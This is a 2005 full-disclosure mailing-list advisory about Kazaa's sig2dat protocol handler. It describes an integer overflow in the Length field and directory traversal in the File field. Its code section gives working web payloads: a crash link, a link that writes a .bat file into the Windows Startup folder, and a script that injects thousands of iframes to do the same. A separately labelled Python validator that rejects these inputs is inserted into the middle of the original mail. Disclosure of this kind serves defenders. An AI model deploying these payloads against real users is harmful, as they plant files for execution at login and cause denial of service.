Message-ID: <001201c4fcd4$d32e9c10$f85ab350@noone>
Date: Mon, 17 Jan 2005 22:40:47 +0200
From: "Rafel Ivgi, The-Insider" <theinsider@....net.il>
To: Windows NTBugtraq Mailing List <NTBUGTRAQ@...TSERV.NTBUGTRAQ.COM>,
        vulnwatch@...nwatch.org,
        "securitytracker.com" <bugs@...uritytracker.com>, news@...uriteam.com,
        full-disclosure@...ts.netsys.com, bugtraq@...urityfocus.com
Subject: Kazaa Sig2Dat Protocol Remote Integer Overflow and Denial Of Service by creating files in arbitrary locations
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application:   Kazaa
Vendors:       http://www.kazaa.com
Versions:      Kazaa Lite K++ (probably all others too...)
Platforms:     Windows
Bug:           Sig2Dat Protocol Remote Integer Overflow and
               Denial Of Service by creating files in arbitrary locations
Exploitation:  Remote With Browser
Date:          17 Jan 2005
Author:        Rafel Ivgi, The-Insider
E-Mail:        the_insider@...l.com
Website:       http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============
1) Introduction
===============
Kazaa is currently the world’s most common P2P file sharing application.
When Kazaa is installed, a new protocol named “sig2dat” is registered with
the system. This protocol contains an integer overflow vulnerability which
may cause a crash and may allow remote execution of code. There is another
vulnerability in the “File:” parameter which allows creating files in
arbitrary locations and causing a Denial Of Service.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
======
2) Bugs
======
The sig2dat protocol syntax:
Sig2dat://<filename>%7c<file length in bytes><file length in kilobytes>%7c<HASH>%7c
The vulnerable parameter is the file “Length” (in bytes): specifying a
numeric value bigger than 999999999 triggers the integer overflow.
Successful exploitation of this vulnerability may allow remote code execution.
There is another vulnerability in the “File:” parameter. It allows creation
of files in arbitrary locations within the same partition as the shared
folder, using the classic directory traversal sequence “../”.
For example:
<A HREF="sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start Menu/Programs/Startup/cool.bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK HERE</A>
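As an added example (not part of the advisory or of Kazaa itself), the following Python validator parses the URI format described above and rejects both problem inputs: it bounds the Length field explicitly instead of letting it wrap, and accepts only a bare file name in File. The 999999999 threshold and the File/Length/UUHash field names are taken from the advisory; the Bytes/KB consistency check and the UUHash base64 shape are assumptions.

```python
import re
from urllib.parse import unquote

# Threshold from the advisory (values above it crashed the client); a real client should bound by its stored integer width.
MAX_LENGTH_BYTES = 999_999_999
_LENGTH_RE = re.compile(r"^(\d+) Bytes,(\d+)KB$")
_UUHASH_RE = re.compile(r"^[A-Za-z0-9+/]{27}=$")  # assumed: base64 of a 20-byte UUHash

def safe_filename(name: str) -> str:
    # Accept only a bare file name: no NUL, no drive letter, no '.'/'..', no separators.
    if not name or "\x00" in name or ":" in name or name in (".", ".."):
        raise ValueError("bad filename")
    if "/" in name or "\\" in name:
        raise ValueError("path separator in filename (traversal attempt)")
    return name

def parse_sig2dat(uri: str) -> dict:
    """Decode and validate a sig2dat URI; raise ValueError on anything unsafe."""
    decoded = unquote(uri)
    if not decoded.lower().startswith("sig2dat://"):
        raise ValueError("not a sig2dat URI")
    fields = {}
    for part in decoded[len("sig2dat://"):].rstrip("/").split("|"):
        if not part:
            continue
        key, sep, value = part.partition(":")
        if not sep or key in fields:
            raise ValueError(f"malformed field {part!r}")
        fields[key] = value
    if set(fields) != {"File", "Length", "UUHash"}:
        raise ValueError("missing or unexpected fields")
    m = _LENGTH_RE.match(fields["Length"])
    if not m:
        raise ValueError("malformed Length")
    length, kilobytes = int(m.group(1)), int(m.group(2))
    # Python ints never overflow, so the bound must be explicit; also require the two size fields to agree.
    if length > MAX_LENGTH_BYTES or abs(kilobytes - length / 1024) > 1:
        raise ValueError("Length out of range or inconsistent with KB field")
    uuhash = fields["UUHash"].lstrip("=")  # syntax is 'UUHash:=<base64>'
    if not _UUHASH_RE.match(uuhash):
        raise ValueError("malformed UUHash")
    return {"file": safe_filename(fields["File"]), "length": length,
            "kilobytes": kilobytes, "uuhash": uuhash}

def is_safe_sig2dat(uri: str) -> bool:
    try:
        parse_sig2dat(uri)
        return True
    except ValueError:
        return False
```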
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===========
3) The Code
===========
1) <A HREF="sig2dat://%7CFile:dev-catz5%28.bin%7CLength:999999999999999999999999999%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK HERE</A>
*********************************************************************
2) <A HREF="sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start Menu/Programs/Startup/cool.bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK HERE</A>
*********************************************************************
3) <script>
var i;
var mylocation;
for (i = 1; i < 10000; i++)
{
    mylocation = "<iframe src='sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start Menu/Programs/Startup/cool" + i + ".bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/'></iframe>";
    document.write(mylocation);
}
</script>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Scripts and Codes will make me D.O.S, but they will never HACK me."
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html